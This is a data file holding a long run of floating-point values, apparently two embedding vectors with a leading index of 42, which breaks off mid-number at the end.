42,0.033531435,-0.030371945,-0.01990903,0.016360277,-0.012391891,-0.001927796,-0.019387221,0.008747847,-0.011479942,0.013882873,0.011789506,-0.003931464,-0.005291573,-0.00080456777,-0.017412486,0.0037206684,-0.011921099,-0.012203909,-0.028324505,-0.028129246,0.0026560088,-0.017256694,0.0080257235,0.0047869105,-0.008066158,0.0072545856,0.01185926,0.03326185,-0.021599466,-0.010406311,0.018329049,-0.035017755,-0.009709237,0.010256717,0.016702725,-0.01108435,-0.0083088,0.014557762,0.000028875815,-0.0174595,-0.011296349,0.019568373,0.012332235,-0.012523749,-0.012730222,-0.014371035,0.011700296,-0.010583235,0.020999122,-0.002731973,-0.015121111,0.0073548965,-0.02292872,-0.008532412,-0.022682,-0.10990532,-0.016706213,0.0013706636,0.0035263351,-0.014435499,-0.016665163,0.02740684,0.0009597534,0.021256471,0.01980009,-0.014178906,-0.0023063205,-0.011406299,-0.0039953114,-0.02102821,0.021089004,-0.023006925,-0.01837422,0.0048913774,-0.007114394,-0.0073486986,-0.013425153,-0.019254973,0.005781491,-0.00004244817,0.0029767405,-0.007627359,0.034264237,0.024958223,-0.021424573,0.0075229704,-0.0021318789,-0.014443761,0.018435184,-0.055701446,0.009464974,-0.0038211884,-0.0065253037,0.020221228,0.010476964,0.018140744,0.017880717,0.0019709317,0.010610605,-0.008369976,0.010500262,-0.031421293,0.02383472,0.0019940434,0.020682372,-0.016229164,-0.007607734,-0.013266842,-0.0076934015,-0.020589639,-0.021163998,-0.023857834,0.0028592055,-0.013336804,0.0030115512,-0.019337574,-0.021538904,-0.020666637,0.027670562,-0.0011167447,0.015895663,0.003992534,0.0048988126,0.014374207,0.01860288,0.014116946,0.00658681,0.005859254,-0.01002645,0.037322298,0.013005149,0.020227823,0.0073683807,-0.0037928948,-0.00091833575,-0.019983139,-0.0077786227,-0.016754147,0.0071221055,-0.03515963,0.0027713624,0.0090776095,0.016970662,-0.0053242594,-0.0133211,0.014344997,0.02436725,-0.020767437,0.039889302,0.042563774,0.009764588,0.03452527,-0.019316407,-0.0032067997,-0.0045157555,-0.0026105952,-0.008845229,0.000050282135,0.015647063,-0.0166882,0.013379749,0.0139055615,-0.030277587,0.0100931665,-0.0048596165,0.0061638723,0.03321752,-0.034690723,-0.0000018872381,0.013619321,0.016810684,-0.010220541,-0.0016693312,-0.0032402878,-0.018270455,0.0034108628,0.008005986,0.0007214895,-0.03386639,0.0065455693,-0.0056323456,-0.009053425,0.021519294,-0.011522623,-0.034340546,-0.008097345,-0.0019944103,0.023342673,0.000918388,-0.004575506,0.010641414,-0.026028499,0.024811065,0.00962401,-0.0052335775,0.0005300801,-0.007092051,-0.0065963166,-0.023926208,0.0049798414,-0.003459738,-0.008303051,-0.004729797,-0.019092409,0.023263367,-0.0016799172,-0.0026784586,0.020765997,0.010226841,0.0037771442,0.005679053,-0.029322768,0.0022581369,-0.0065976772,0.0020636104,-0.011436788,0.0061441287,0.03380211,-0.0031813837,-0.003853354,-0.014614581,-0.024099782,0.015264657,-0.021162136,-0.0012459382,0.00051551487,-0.021050673,0.015562184,-0.052449398,0.012516251,0.01375008,0.009066818,0.015209887,0.02597349,0.024335794,-0.0446754,0.0024255868,-0.015776318,-0.00024279396,0.007768529,0.019785367,0.010388926,-0.002016172,-0.0065123835,0.00083931535,0.04668355,0.007217053,-0.0011076923,-0.02529367,0.011524926,-0.010226722,0.0028489043,-0.015062895,0.021834595,-0.010471285,-0.022732163,0.016963951,-0.0006980674,-0.03204683,-0.00336221,-0.008897665,0.001703612,0.055253647,0.0013351477,-0.0081312535,-0.013829221,0.019690368,-0.014064944,-0.008880527,0.013660126,0.033215173,-0.011429236,-0.023523914,0.01867966,0.008485811,-0.011636753,0.006322789,0.01740802,-0.010493999,-0.020630175,0.031888887,0.017537374,0.018742193,-0.017105164,-0.019029785,-0.004730069,0.015064831,-0.021609003,-0.008079222,0.0034347635,-0.0075642145,0.013293943,-0.00638703,-0.0068765697,-0.0046420833,0.027042331,-0.0000720642,0.039342586,0.010782618,0.03617467,-0.01133953,-0.0033848702,-0.005031501,0.021553257,0.030731296,-0.0062790094,-0.0037589523,-0.003442893,0.012216577,0.015420305,0.00543673,0.00076966576,0.012152217,-0.016197758,0.022295428,-0.017573107,-0.009141185,-0.022990631,0.0055904468,-0.014954404,0.020789756,0.0031156882,-0.011156854,-0.01584676,0.0010523713,0.0042376425,0.005157813,0.017719846,0.0012446371,-0.018729249,-0.011821708,0.006942662,0.0017209623,-0.00050947873,0.017667068,0.0069299038,-0.0019756225,-0.021322943,0.001527862,0.008828134,0.019190662,0.013192935,0.011261007,0.005866625,-0.0016463276,-0.023198204,-0.013405198,0.00032686026,-0.023270523,0.0066944826,0.02714076,0.0065777535,-0.0152673945,-0.0101970155,0.011770813,0.0069392617,-0.012298833,-0.015626516,-0.0029708503,0.02146151,-0.018645225,-0.015892845,0.010431666,-0.0037615993,-0.011871133,-0.004007091,0.012736046,-0.02403949,0.017942153,0.010596048,0.0059381546,-0.003893855,0.0020909093,-0.031973325,-0.006275685,-0.009752903,0.01201182,0.016423877,-0.028798504,-0.010142539,-0.0040740664,-0.0010027845,0.031716075,-0.014717376,-0.015277713,0.008253642,0.0087357145,-0.004730126,-0.004776346,0.006061342,0.011751909,0.019751914,0.031669144,-0.018832762,0.015403553,-0.012366489,0.005902685,0.008877947,-0.008601986,-0.00571394,0.018420586,0.012181584,0.013540497,-0.016570704,-0.005975571,-0.019022603,0.0018975959,0.0011787517,-0.0009216068,-0.0028974323,0.03489853,-0.047821213,-0.009226814,0.015660701,0.009632016,0.0013057961,0.027046725,-0.0191154,-0.01964473,-0.0034586454,-0.014772074,-0.006960327,0.01704885,-0.010346364,0.007385654,-0.0054610604,0.010300896,-0.017767077,-0.028698076,-0.0059616957,-0.09400497,-0.0007315515,0.013392166,-0.014404856,0.04646323,-0.0078189485,0.008124859,0.007698783,-0.002017583,0.011260967,-0.015396116,-0.004687697,0.0096075535,0.0031725825,0.017561924,-0.005373571,0.0086045535,0.0052309255,-0.0035588923,-0.03004604,-0.0016278501,-0.009796867,-0.022895489,-0.0007646299,0.008454913,0.0015802828,-0.0012995889,-0.010427062,0.010819576,-0.0072128833,0.0018543989,0.016092012,-0.010609943,-0.016069733,-0.007905403,-0.0069904313,-0.031225866,0.0052812197,0.027062746,-0.013693132,0.005662303,-0.00008462034,-0.0114714885,0.0067919553,-0.028867494,0.022461388,-0.015507061,0.011795491,-0.023724124,-0.010994042,0.01312256,0.0050675143,0.016099721,0.015495054,0.00019461688,-0.0006096653,0.022321945,0.0034369293,0.02309828,0.0003680284,-0.0053627254,0.011540811,-0.017456878,-0.010041111,0.0041366625,0.0043483735,-0.0054579554,0.016271912,0.004472048,0.016280776,0.0049151108,-0.035053957,-0.0023091363,-0.00041254028,-0.0007635279,-0.00039004572,0.009494644,-0.015746811,-0.01932468,0.0047224215,0.04337043,-0.007995376,0.024874687,0.0064109657,-0.010643504,0.01825031,0.0009310344,-0.005569395,0.0035683142,-0.005336065,0.006371751,-0.013599357,0.018633528,-0.012541885,0.016633006,0.012974138,-0.005695399,0.0031312387,-0.0097750975,0.0071188705,-0.011479637,0.009153551,-0.011052375,-0.008190569,-0.026951157,-0.02711689,-0.0038801394,-0.020230534,-0.013791669,-0.0061005647,-0.013790564,0.029353932,0.037618935,0.022743715,0.023491653,0.0116896015,-0.004750025,0.012890982,-0.017368056,-0.01667096,-0.01801202,0.003719086,-0.026545975,0.04043572,0.016838303,-0.0056157513,0.007535644,0.00753393,-0.018105423,-0.0016821226,0.0027733631,0.019855604,0.003554253,0.024686622,-0.021267565,-0.005739421,-0.008115062,0.028238265,-0.007602427,0.0091173705,0.021936301,-0.009580215,0.011900984,-0.0062940386,-0.011972903,0.007945779,0.009039333,-0.0074343975,0.016017213,-0.010316197,-0.009562159,-0.0006426863,-0.01471207,0.010132462,-0.023470456,0.010799651,0.0035422281,0.018392423,-0.01911245,-0.02070288,-0.0030398415,0.02342327,0.015364846,-0.0076536783,-0.012589058,-0.0030248645,0.014940884,0.0053160056,-0.019443514,0.021162108,-0.031539574,-0.017765459,0.022152433,-0.013047204,-0.018629575,-0.015582279,0.02027547,0.02770514,-0.017030235,0.01282952,-0.038530547,0.014008019,0.0007498028,0.008661973,-0.003060904,-0.012033107,0.01674393,-0.01087879,0.0025020156,-0.00095343613,0.029986981,-0.021303719,-0.016654545,-0.0010697695,0.002690371,-0.016320217,0.000463375,0.0055031767,-0.01846841,0.004873271,-0.004413672,0.013036637,-0.004779423,0.018586373,0.043256097,0.0022891746,-0.010188373,0.012879498,-0.009273547,-0.0010622976,-0.010694064,0.011035299,0.036234368,0.10543106,-0.0032158785,-0.002602294,0.0064808717,0.0180613,0.014550212,0.007955119,-0.021113146,0.0031789546,0.0062793726,0.032972604,-0.011441794,0.017731668,-0.008982357,-0.02185139,0.024609283,0.030740755,-0.022616627,0.012859011,0.017343296,0.043163143,-0.023618024,0.0021950547,-0.052511808,-0.002266196,-0.06705012,0.028155994,0.026753584,-0.007497758,0.02872849,0.0017448643,0.020405022,0.042999487,0.02162012,-0.028549956,-0.014343619,-0.007400378,-0.008685483,-0.0012529044,-0.014194753,0.028844835,0.009863459,0.005889421,0.0023965256,-0.021811811,-0.01987602,-0.0023906901,-0.0007079456,0.011678149,-0.0071631153,0.0037582563,-0.0030966275,0.010885006,-0.0009893384,0.027416026,-0.002184192,0.0066319685,-0.00688341,0.01826708,-0.015313369,0.016345559,0.010153064,0.005771448,-0.011053153,0.023893848,-0.008301178,0.002470386,-0.007737834,-0.016046546,-0.009744985,0.016598955,0.008274586,-0.013510068,0.0007551712,-0.019135445,0.018397227,-0.008205262,-0.0054815724,-0.005629497,-0.003958346,0.002722506,-0.000044978577,0.008701208,0.0021548625,-0.0063576894,0.0085318275,-0.04519936,0.03923228,-0.0005808753,-0.014283751,-0.013246876,0.015758524,0.014194419,0.018607598,-0.007038077,-0.0021245722,0.02100355,-0.0013225432,-0.0026139647,0.0029452296,-0.0006824299,-0.011497111,-0.014080314,-0.004115416,0.0043932144,-0.020390516,-0.0058127125,0.0016999472,-0.007736365,-0.014390794,-0.0029822313,0.0047938707,0.0033744827,0.012870496,0.007439277,0.026929954,-0.033215974,-0.021555472,0.025149705,-0.010342639,-0.0115457345,0.018736778,0.020389443,0.044380587,0.013033333,0.02435766,-0.015805665,0.0036492203,-0.0022223196,0.0035265642,0.0067686457,-0.022990447,-0.0064859428,0.013053841,-0.0049150386,0.015011957,0.023286713,-0.011449557,0.012011917,0.0055119614,0.029735763,-0.011928032,0.007584653,0.014515654,0.011105944,-0.0010634968,0.020118104,0.024753027,0.0034151,-0.0022106483,0.01617526,0.01827771,-0.0025687316,-0.018520411,-0.036002774,-0.0060367845,-0.009306692,-0.000482841,-0.018231573,-0.012020849,0.005474047,-0.0037429025,0.02266717,-0.05286739,0.004083789,0.019374894,0.021950461,0.028293503,0.009020817,0.01294857,-0.021157825,-0.0015163886,0.005349772,0.019905698,-0.0052732034,-0.0022810968,0.011146752,0.011509333,-0.008655358,0.020317446,0.024786588,0.009611765,-0.0021976063,0.013655833,0.012530604,0.003811398,0.004516077,0.015003518,-0.0222149,0.018244648,-0.007359877,-0.003086647,0.004982688,0.015636045,0.0034290385,0.015818883,-0.023743514,0.031697277,-0.02825789,-0.025780145,-0.01167929,0.0022563324,0.010510986,-0.0029781961,0.012416813,-0.019151757,0.0026361127,0.00045543784,-0.0027941728,-0.023084281,0.011487528,-0.011662642,0.0076391352,-0.024159202,-0.0032404556,0.016621025,-0.004054148,-0.030533234,-0.0017233578,-0.020863509,0.008513834,-0.0058840113,-0.011912361,0.004867769,-0.011047105,-0.0014915444,-0.023319958,0.0065319776,0.00766406,-0.03583042,-0.016819471,0.004180018,-0.01039817,0.0007631619,-0.0056571285,-0.016811125,0.019498998,0.017227734,0.004269589,0.020183992,-0.004122099,0.015670585,-0.003822053,0.0018851011,-0.012780301,-0.003087616,-0.010808074,0.009209429,-0.0027977237,-0.015688926,-0.031762894,-0.0006464263,-0.027571242,-0.025239479,-0.016043477,-0.010427349,0.003630065,0.03556606,0.032143194,-0.0064723613,0.010054045,0.009825958,-0.007042394,0.015636561,-0.001419918,0.009879007,0.011008638,-0.0071916287,-0.007071565,-0.003156564,-0.008970517,0.023680167,-0.0138714,0.013870323,0.0046984064,0.010576646,-0.0028343098,-0.0017854964,-0.011969299,-0.013220199,0.012439181,-0.024043014,-0.00703339,-0.013610135,-0.0065991045,-0.025561834,0.0021583086,-0.003993614,0.054263603,-0.05449979,0.0033287131,0.01760592,-0.023252565,-0.023716198,0.010803942,0.012552517,-0.0368078,-0.026849164,0.016069517,-0.008328319,-0.016665734,-0.018480014,-0.004481579,-0.00027700688,-0.018307332,0.004472604,0.026649635,0.004119778,-0.006226478,0.018614173,0.002824172,-0.0023017381,-0.014651591,0.015893294,-0.02959218,-0.0101147005,-0.0051159607,-0.007994169,0.008819959,-0.004115029,0.026525754,-0.024396626,0.00024233181,0.0075187883,-0.0012276922,0.013936341,0.004203266,-0.02244581,-0.01594483,-0.011839044,-0.0052525625,-0.005280053,0.0050977184,-0.029221777,-0.024645934,0.0069829556,0.004308903,0.1345472,-0.0141273495,-0.0064080637,-0.0050923545,0.006259809,-0.033560425,0.01923183,0.01914743,0.0019309629,0.007440847,0.006105153,-0.017438248,-0.005406226,0.014799471,-0.0037910084,0.011444378,0.0062066936,0.14530103,0.009061604,0.020529984,0.010091756,-0.00024567993,0.010438842,-0.00633676,0.0034900957,-0.09533259,-0.008774164,-0.024770433,0.014997878,-0.006447545,-0.03558898,0.025937416,-0.004783369,0.012936979,-0.0015915936,0.014146487,0.022058165,0.005775513,-0.011422001,0.008547852,0.0058280565,-0.009331316,-0.012946181,-0.00054526684,-0.0125254,0.023373974,-0.03058938,-0.008446697,-0.024555318,0.029019153,-0.0060058776,-0.009669644,0.0069262083,0.016069027,0.0037017057,-0.00058580306,0.016103726,-0.020082632,-0.040086873,0.021619149,-0.003239796,-0.0028979108,-0.0030821427,0.029738273,-0.0037704315,0.0011993477,-0.026371183,0.012147422,0.008338248,0.02202654,0.006150337,-0.0033177335,-0.008549358,0.0021139432,0.03457756,0.00861526,-0.016387872,-0.004092893,0.016142484,0.014115914,-0.00017832794,0.008557839,-0.030380327,-0.0056997235,0.016402049,0.008378118,-0.0054978332,-0.00816025,0.0013355964,0.016904555,-0.016478589,-0.0046022185,-0.0035669205,0.011149249,0.008636421,0.0065634963,-0.0059854668,-0.012623888,-0.0047079036,-0.016866077,-0.0052842326,0.019402403,-0.0060497816,-0.014016314,0.009088423,0.0046119657,-0.036418185,-0.02553416,0.0030950159,0.009181052,0.0080521135,0.0018146887,-0.010333635,0.010775155,-0.013038738,0.00062019815,-0.008376341,-0.009956167,-0.03531247,0.0063123945,0.0022846002,-0.009012306,0.0048028594,0.008065672,-0.02283565,0.0077307876,0.022654716,-0.01223274,-0.013614286,0.0040668715,-0.016589042,0.006300806,-0.012586408,0.046419032,-0.017096303,-0.017099544,-0.0139365895,-0.045600537,-0.012130432,0.006619472,0.016451886,0.011027182,0.007838791,-0.010157884,-0.0049482714,-0.0126751205,0.01660612,0.003134143],[-0.005331723,0.005863456,-0.0047608446,-0.014893405,0.018393006,-0.0039537554,0.0017287639,-0.007946219,-0.0060907747,-0.018277436,-0.0032336267,0.028798157,0.004359657,-0.0067426953,-0.020749645,-0.007257562,0.021757286,0.0007835482,0.013459912,-0.007627469,0.01635282,0.0033049595,0.021597741,-0.022596467,0.011014813,0.00331192,0.0041051055,0.012571711,0.0044494555,0.0109658595,0.00023461405,0.026130581,0.008802993,-0.002546124,-0.011057703,-0.0007651798,-0.019053197,-0.03400524,0.020340595,-0.023678532,-0.0077018146,0.02408321,-0.012844692,0.03603718,-0.016529167,0.0019383954,-0.014319542,0.027711717,-0.010042882,0.0046650586,-0.0059465915,0.007058749,-0.019721542,-0.0009327598,-0.010307667,0.020655788,0.0018813543,-0.039211128,0.015177864,-0.020678714,-0.0010814036,0.028943092,0.0030195673,-0.016483465,0.02315046,-0.0065405285,0.015820764,-0.005882351,-0.0101660695,-0.012311794,0.005500148,-0.0068529174,0.01701186,0.0014053256,0.022536254,0.013168555,0.00059389026,-0.011164302,-0.008839411,0.015891192,-0.009372797,0.001793997,0.010966359,-0.0046288013,0.00828077,0.020940203,-0.023393307,-0.013352457,0.0001165195,-0.027353568,-0.008659939,0.005279881,0.0061556264,-0.0003143769,-0.03176698,0.009934124,0.017940415,-0.003745074,0.0051802495,0.02646941,-0.003030756,-0.005473241,-0.025730558,0.011142275,0.022729954,-0.025162986,0.0002630956,-0.0061068106,-0.009094969,-0.03158622,0.0033039316,-0.00025441204,0.01307694,-0.0020015403,0.0031486107,-0.0045696152,0.0047756718,0.012063927,-0.007378477,0.0018630526,-0.021912156,0.02039135,0.019593962,0.012599673,0.008822079,-0.015795834,0.0042986358,0.027726509,0.0047967406,-0.0053078867,-0.023128131,0.0229077,0.015615392,-0.0065793484,0.007868361,-0.0029359171,0.0076226466,0.012712632,0.003304901,-0.009019925,0.014151851,-0.0008573638,0.020314524,-0.015599088,0.018502811,0.014410599,0.010128601,0.011201409,0.016530206,-0.012419848,0.00091813673,0.009511248,-0.013156783,-0.037071664,-0.010001008,0.008962288,0.0033135558,-0.01808661,-0.014892978,0.0048042103,-0.0018511367,-0.0055034254,0.015436985,-0.010630526,-0.014652279,-0.028627034,-0.014755288,-0.0017355005,-0.00846889,0.0013817421,0.00906131,0.02781883,0.014493045,-0.014795523,0.01354319,0.020913713,-0.012656884,-0.007160378,0.006304033,-0.030224668,0.0077696247,0.01922547,0.0056430986,-0.0053477422,-0.00934176,0.035048835,0.00025743022,-0.010422546,-0.02499475,0.0019834065,-0.0029323013,-0.014371864,-0.0064502456,0.003898303,-0.012785723,-0.033876233,-0.013200188,0.09304493,0.0052072024,-0.0068284925,-0.029738063,0.013294427,0.007412641,-0.027532373,-0.004135278,-0.012616214,-0.01371139,-0.011666377,0.006431139,-0.016332818,0.002321084,-0.014952912,-0.004303697,0.009005993,0.022208367,-0.04282462,0.008907823,0.02755165,-0.0029346568,0.0066773137,-0.013742938,0.012206291,0.0043421476,-0.019543367,-0.0061277812,-0.045314863,-0.011080026,-0.0095074745,-0.027088765,-0.023610264,0.010950784,0.018666022,-0.026864912,0.0008116468,0.027770374,-0.020996068,0.007675339,-0.0022581352,0.0055778036,-0.014006326,-0.010896428,0.011403583,0.03008621,0.021582376,-0.017583128,0.0023287856,0.021696694,-0.01580689,-0.019190503,-0.0029802925,0.011759547,-0.0108271325,0.004918918,0.018819084,0.0020256634,-0.022261286,-0.009388292,-0.005393499,0.0095673995,-0.0030233583,0.034678206,0.004412011,-0.0131192915,0.0060910764,0.022242505,0.0072678607,0.025792837,-0.036555268,-0.0018704867,-0.00021916354,-0.016152013,-0.021804484,-0.012420136,0.0033747558,0.012709241,-0.011426123,0.015566476,-0.002576628,0.030299213,0.006328881,0.0062186504,0.006061276,0.0057176556,-0.019971207,0.011154682,0.004531682,-0.012520143,0.0033188392,0.019254513,-0.011935643,0.005854957,-0.0012094507,0.006613446,0.0069313683,-0.0204734,-0.009511677,-0.024310805,0.010802302,0.012183835,-0.001457923,-0.005345118,-0.013708352,0.007984163,0.009703745,-0.0035809665,-0.005302984,0.0008597257,0.03853996,0.0022788947,0.018741358,-0.04396136,-0.012237157,-0.010295619,0.0019269629,-0.0024748913,0.010767752,0.0015920657,0.00094593206,-0.008404634,0.011078384,0.0032883203,-0.026178183,0.004652059,-0.02348739,-0.016604804,0.008561333,0.0148179075,-0.009113818,0.024577659,0.014486855,0.0056705438,0.013721088,0.006421337,0.023147553,0.013064946,0.021558339,-0.01834731,0.01981859,0.017370766,-0.00734936,-0.019855639,-0.0069600157,0.001272098,0.004006756,-0.01134811,-0.007788805,0.0032702826,0.017325329,0.012736817,0.0016360717,0.033455055,0.0020775602,0.014812908,0.0012587294,-0.014936682,-0.0040367167,-0.006761566,-0.009481734,-0.009406756,-0.03598672,0.022842245,0.0038491206,-0.018050684,0.012409326,0.06656889,0.007667978,0.017796535,-0.0011329853,-0.0075796703,-0.01811518,0.01454069,-0.0061114337,0.013796181,0.006201214,-0.02693811,-0.011816386,0.021217743,0.016745621,-0.011966981,0.023111394,0.00063415314,0.0037324417,-0.015513168,-0.010467578,0.02620781,-0.023644855,-0.0009778667,0.013496948,0.030656511,0.016375858,0.0103926845,0.0059686545,0.008233554,-0.022712046,-0.004407874,-0.004575735,-0.012978875,-0.01051669,-0.03515456,0.023958586,0.018372687,-0.010284533,-0.013063893,-0.010620282,0.01632632,0.011678784,-0.01370739,-0.015267549,0.0035635268,0.019608222,-0.012773567,-0.012895894,-0.029690985,0.00801596,0.010459167,0.03423592,-0.018123195,0.008223112,0.008323688,0.0062981043,0.010984895,-0.025064545,0.028282475,0.016994808,0.0050655897,0.0077098194,0.007545702,-0.000501132,0.0040828437,0.021857481,-0.016595373,0.028353518,-0.019708533,0.0024302355,0.014692453,-0.00018197774,-0.00092301983,0.003619059,0.0060177865,0.016069196,0.005744472,-0.0073464382,0.0044024894,0.011724103,-0.0154760545,0.024769783,0.002736948,-0.012847868,-0.018134374,0.021351172,0.0013237046,0.011801762,0.01302555,0.0025253634,-0.023706375,0.00961127,0.028667673,-0.004803699,0.000630879,0.018690815,0.01067295,0.013943233,-0.008228739,0.011332743,0.0038509977,-0.015553888,-0.0031565907,0.0060180463,-0.004834264,-0.0100887595,0.019233877,-0.0015082676,-0.00097557966,0.026574614,-0.017984964,0.011740176,-0.015854899,-0.02152981,-0.010925485,-0.044248663,-0.007373071,-0.0027426973,-0.01359849,-0.024695726,0.053524107,0.008557704,0.022043793,-0.0035189462,-0.0017733818,0.015523343,0.0026525517,-0.015085778,-0.0024586031,0.0100018205,-0.0074477014,0.018274132,0.0123074455,-0.044683784,0.004042453,-0.015884737,-0.008042852,-0.031065147,0.034176245,-0.0024744428,0.0093482565,0.026312511,0.049116794,-0.018213281,0.020648627,0.040446382,0.05315755,0.0012984044,-0.009046894,-0.01650509,-0.005778766,-0.013419877,-0.0047006086,-0.012680527,-0.008383495,0.010411533,0.031251024,-0.019823559,0.0036345215,0.0073399115,0.014095704,-0.034013785,-0.0019831713,0.000016710454,-0.014077797,0.023120785,0.006365257,0.085096985,-0.0070880237,-0.021750502,-0.00870159,0.028773684,0.0006222436,-0.025246762,0.036260776,-0.011722305,0.014066783,-0.0077749146,0.0012240465,0.0063405107,0.011359201,-0.026796885,0.0043221097,-0.0016435158,0.003975964,0.010331453,0.0031786219,-0.00414521,-0.007457151,-0.009143976,-0.042416297,-0.0014482267,0.012212613,0.021952564,0.014845343,-0.0031510468,-0.012574426,-0.030611616,0.000991685,0.02732712,-0.015732273,0.014640538,0.008440698,0.006021665,0.0015183181,-0.0071654604,0.015534122,-0.0071470705,0.012887508,0.0018855697,0.018865177,0.03195926,0.004988413,0.017151238,0.014293401,0.016504196,-0.00821954,-0.0031135038,0.02724456,0.003810972,0.007867733,-0.014380732,0.00421841,0.019721739,0.012834641,-0.012979232,0.02859262,-0.006414081,-0.0054990696,-0.02616551,-0.003950288,-0.006098028,0.01511557,0.010045008,-0.016690528,-0.011362071,-0.030661896,-0.0018433962,0.0279035,-0.010439271,-0.006712464,0.01106215,0.021300504,-0.012015756,0.022281703,0.0062339474,0.0030254126,-0.004080164,0.013927374,-0.0055935453,0.0013519588,0.015083061,-0.014819486,-0.0029292433,0.002172658,0.0032654621,0.0038391203,0.0048137456,-0.009503233,0.023067119,0.0036644426,0.024169397,0.0051560937,0.005760968,-0.04289762,0.008644792,-0.0025352628,-0.016614629,-0.02378304,-0.0035382824,0.008047029,-0.012816902,0.0009660983,0.0014192198,-0.004848948,-0.0036889904,-0.0119386995,0.013378185,-0.05406633,-0.020294055,0.008896052,0.005088455,-0.0120070055,0.029156506,0.020781092,0.0066263685,0.00016173052,0.0007760015,0.0102935275,-0.021315847,-0.011197204,0.011944666,-0.013367088,0.003603287,-0.047046334,-0.027333908,-0.0051643816,-0.031938855,-0.03315196,0.039585125,0.0033027197,0.008596358,-0.013446767,0.0008903217,-0.007615621,0.00804213,0.0026168094,-0.04512892,0.0073313317,-0.0043549524,-0.014770436,0.023484915,0.0039997743,-0.0108295055,-0.0055711837,-0.02447138,0.005597678,0.010252936,-0.004803059,-0.010935903,-0.014819331,0.015357922,0.010971824,0.016715428,-0.03207416,0.0014048367,0.0071389456,0.03725491,-0.0030757037,0.018271303,-0.006604183,0.012853561,-0.012386764,0.015417922,0.01288479,0.0396786,0.015773505,-0.016037958,-0.0027259884,-0.0015301084,0.0025263198,-0.013820378,0.012322896,0.020865805,0.020181406,0.0077231023,0.0052232244,-0.014250673,0.010659668,-0.0025697295,0.01365513,-0.010903993,0.008830086,0.009786444,0.011561102,-0.0051094503,-0.0024316213,0.026298752,0.0005841449,-0.009064927,-0.0015056283,0.03112432,0.04702805,0.012396593,0.02438891,0.016811995,-0.00021803063,0.011246149,0.026237745,-0.0026735372,-0.017846007,-0.013368,-0.0023006678,-0.009169496,-0.008330417,-0.03295068,0.012612276,0.01924417,0.010330301,-0.01982635,0.0004720812,-0.009091412,-0.0028608032,-0.013487696,-0.034907293,-0.0226428,-0.008654398,0.017217517,-0.020826226,-0.012778104,0.0035419436,-0.008332265,0.01024442,0.010234031,-0.016050916,-0.0047110976,-0.010305729,-0.0029019322,0.020785268,0.017880557,0.000456082,0.007903497,-0.014555671,-0.00356513,-0.014141031,-0.0028385955,-0.004234348,-0.0053059915,0.011138767,0.0044658934,0.010575157,-0.009505923,-0.010149926,-0.01271016,0.006792607,-0.015934782,-0.0148383,0.009932171,0.01047529,0.006606374,0.01097525,-0.032667868,0.026519757,0.02628279,-0.022510424,0.0068763886,-0.006432225,0.020684166,0.025158864,0.04640751,-0.0038920043,-0.025606604,-0.022857424,0.001811378,0.0018712521,0.011192909,-0.002750736,-0.030626552,-0.024237929,-0.021714082,-0.0060865334,-0.010619838,0.0030006797,0.0030658098,-0.013298967,0.032931138,-0.018950908,0.017273901,0.016096683,0.008111575,0.022349156,-0.027131448,0.019445421,-0.01437794,-0.02594455,0.034940865,-0.026088458,0.020049222,0.016403206,-0.019387204,-0.026498687,-0.016232504,0.0096590305,-0.015862355,0.015581478,0.018540394,-0.016198473,-0.026729185,0.0033167442,-0.011377187,0.0133661395,-0.027172746,0.0021822634,0.013919011,-0.0026546207,0.011809273,0.015658515,-0.029830514,0.0078090355,-0.0066616475,0.021613045,0.0059543834,0.01007651,0.021090023,0.008970342,0.012593463,-0.008280776,-0.016814042,0.01886994,-0.007424761,0.000087769455,0.03284784,0.0073518883,0.022760337,-0.0053501152,-0.013480317,-0.010384269,-0.007877938,0.0027821674,0.0004592488,-0.0037001257,-0.0014738725,-0.0062252632,0.0050141737,0.010408288,0.032360494,-0.0067608133,0.0171527,0.034826767,0.008280124,-0.033097263,0.0066432036,0.008460681,-0.0043117516,-0.0076724617,0.010370079,-0.012070116,0.01051271,0.020202357,-0.012689263,0.00007694382,0.023310058,-0.013083923,0.0044465666,-0.02136848,0.0044187275,-0.0016857869,-0.0057536447,0.019729845,-0.0065214587,0.002161736,-0.004694303,0.0001953687,0.012796327,-0.0060830885,-0.00268682,-0.016614912,-0.0056287074,0.024662202,-0.013405341,-0.0037006328,-0.0003032406,-0.012156892,-0.014614234,0.01570862,0.020754756,-0.011011701,0.0105651375,0.000039842842,0.0002144193,-0.020297017,0.010049063,-0.018334825,0.015558397,-0.00013445677,-0.0024509695,0.0010841676,0.0037056804,-0.006197305,0.00551829,-0.0012634674,-0.02057159,0.016905498,-0.017630784,-0.039306074,0.014953958,-0.0008574297,-0.0066437116,-0.026002368,0.008634914,0.019394329,-0.023778113,-0.01895825,-0.008335883,-0.079756,-0.002570673,-0.02228014,-0.0059958184,-0.015462779,0.015024268,0.0042865416,0.0040529887,0.020359877,-0.0002412065,-0.008621271,0.021445602,0.024238203,0.0030209415,0.014161371,-0.0072155427,-0.030113744,-0.005613059,0.021224549,0.006593255,0.0012510772,-0.0027667098,0.012753684,-0.008753941,0.053579967,0.0045205574,-0.010218367,0.00015423827,-0.018945161,0.0045331586,0.0004066107,0.035596237,-0.027622037,-0.028692247,0.0060243895,0.010928335,0.010163711,0.026660936,-0.0001838395,0.024984578,-0.0053079766,-0.010411363,0.0022129344,0.042434946,-0.015678681,-0.0047183647,0.011883145,0.0009319995,0.004213225,-0.029241443,0.012770758,-0.011791638,0.0022113898,0.009117207,-0.01230065,0.019160543,0.001253961,0.008796703,0.013771326,0.0050763055,0.01179882,-0.01308061,0.029712422,0.015808458,-0.03503099,-0.021621205,-0.0033935695,0.042257424,-0.0006659649,-0.0075194803,-0.035867028,-0.0173979,-0.013370167,-0.0070243054,-0.024820589,0.024418268,-0.004121959,-0.002778469,-0.0028333345,-0.02137569,-0.013460484,0.014642069,-0.013178798,-0.00040580452,-0.025993688,-0.024703847,-0.005236547,-0.0054224906,-0.008077848,-0.01631178,-0.019806214,0.0021921003,0.0112460675,0.032361217,0.0059755417,0.028332673,0.009608369,0.030027231,-0.0008466005,0.008717908,-0.004676673,-0.0013600069,-0.0024826191,0.063440576,0.016013822,0.0008461779,0.008744583,0.013351086,0.010807822,0.004640823,-0.012868792,-0.005081494,-0.005502169,0.018340122,-0.015008167,-0.011384756,-0.0038953775,0.012414544,0.026127998,0.010803023,-0.005606781,-0.012222038,0.018439323,-0.004429426,0.016138675,-0.02031153,0.0037638866,-0.0065870606,-0.023239145,-0.0064020697,0.005694305,0.0059287334,0.016089775,-0.009176436,0.014825974,0.013621967,-0.0018672172,-0.0129735395,-0.020172372,-0.026958324,-0.013738505,0.0030591888,-0.021353746,0.00403274,-0.010638292,-0.015546299,-0.00488236,0.0257